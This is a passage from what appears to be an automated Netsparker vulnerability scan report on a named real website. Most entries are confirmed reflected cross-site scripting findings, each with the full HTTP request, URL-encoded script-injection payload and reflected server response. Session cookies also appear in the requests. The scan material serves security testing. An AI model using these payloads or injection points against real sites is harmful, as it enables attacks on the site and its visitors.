    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:00:30 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 180
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"-->netsparker(0x0003D6)script>style>

  • Request
    GET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1
    Referer: http://www.shalomlaam.co.il/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:44:38 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 166
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/pitgam'"-->netsparker(0x00013F)script>style>

  • Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:01:43 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 182
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"-->netsparker(0x000452)script>style>netsparker(0x00012E)script>style>

  • 3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x0004E9)

    Request
    GET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:03:46 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 165
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/page/'"-->netsparker(0x0004E9)script>style>

  • Request
    GET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:04:11 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 173
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/about/search/'"-->netsparker(0x00052F)script>style>

    netsparker(0x0003B2) HTTP/1.1
    Referer: http://www.shalomlaam.co.il/js/func_site.js
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:00:21 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 180
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"-->netsparker(0x0003B2)script>style>

  • Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:56:21 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 181
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"-->netsparker(0x00029F)script>style>

    ''''-->netsparker(0x000245)

    0

  • 3.24. /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x0001CB)

    Request
    GET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1
    Referer: http://www.shalomlaam.co.il/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:47:56 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 173
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/tags/tags.asp'"-->netsparker(0x0001CB)script>style>

    netsparker(0x00040D) HTTP/1.1
    Referer: http://www.shalomlaam.co.il/js/func_site.js
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:00:55 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 171
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/js/+ win +?'"-->netsparker(0x00040D)script>style>

  • 3.26. /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x000127)

    Request
    GET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1
    Referer: http://www.shalomlaam.co.il/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 13:44:21 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 182
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"-->netsparker(0x000127)script>style>

  • 3.28. /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
    CONFIRMED
    http://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..

    Parameters
    Parameter Type Value

    URI-BASED Full URL '"-->alert(0x00046E)

    Request
    GET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Host: www.shalomlaam.co.il
    Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
    Accept-Encoding: gzip, deflate

    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0
    Date: Tue, 20 May 2014 14:02:57 GMT
    Content-Type: text/html
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    Vary: Accept-Encoding
    Content-Length: 172
    Pragma: no-cache
    Expires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/contact/reg/'"-->netsparker(0x00046E)script>style>

  • RequestGET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:07 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 168Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/scripts/'"-->netsparker(0x0000FD)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:33 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"-->netsparker(0x0004D2)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:37 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/kaftorim/'"-->netsparker(0x00057E)script>style>

    alert(0x000642)

    RequestPOST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/ask/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate

    emailtonews=netsparker%40example.com&

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:07:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"-->netsparker(0x000642)script>style>netsparker(0x0002B1)script>style>

  • 3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x0000D7)

    RequestGET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 163Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/js/'"-->netsparker(0x0000D7)script>style>

  • 3.41. /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x00028A)

    RequestGET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: privateDate: Tue, 20 May 2014 13:56:05 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Encoding: Vary: Accept-EncodingTransfer-Encoding: chunked

    404;http://www.shalomlaam.co.il:80/site/contact/'"-->netsparker(0x00028A)script>style>

  • RequestGET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/site/Presentation/'"-->netsparker(0x0002DC)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:09 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/site/'"-->netsparker(0x000106)script>style>netsparker(0x0003EB) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:35 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"-->netsparker(0x0003EB)script>style>

  • 3.48. /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x000134)

    RequestGET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:28 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/gvideo/index.html'"-->netsparker(0x000134)script>style>

  • 3.50. /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..

    ParametersParameter Type Value

    id GET 805

    URI-BASED Full URL '"-->alert(0x000195)

    RequestGET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:46:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/ask/answer.asp'"-->netsparker(0x000195)script>style>

  • 3.52. /images/pagetop.asp CONFIRMEDhttp://www.shalomlaam.co.il/images/pagetop.asp?'"-->alert(0x0003EA)

    ParametersParameter Type Value

    Query Based Query String '"-->alert(0x0003EA)

    RequestGET /images/pagetop.asp?'"-->netsparker(0x0003EA) HTTP/1.1Referer: http://www.shalomlaam.co.il/images/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:34 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"-->netsparker(0x0003EA)script>style>alert(0x000560)

  • RequestGET /about/search/default.asp?'"-->netsparker(0x000560) HTTP/1.1Referer: http://www.shalomlaam.co.il/about/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:25 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 185Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"-->netsparker(0x000560)script>style>

  • ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:49 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/news/'"-->netsparker(0x000400)script>style>netsparker(0x000160)script>style>

  • 3.59. /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x0000E8)

    RequestGET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 183Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"-->netsparker(0x0000E8)script>style>

  • 3.61. /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..

    ParametersParameter Type Value

    URI-BASED Full URL '"-->alert(0x00011E)

    RequestGET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate

    ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:18 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT

    404;http://www.shalomlaam.co.il:80/home/home_page.css'"-->netsparker(0x00011E)script>style>

  • 3.63. /vod/vod.asp CONFIRMEDhttp://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

    ParametersParameter Type Value

    id GET '"-->alert(0x00015D)

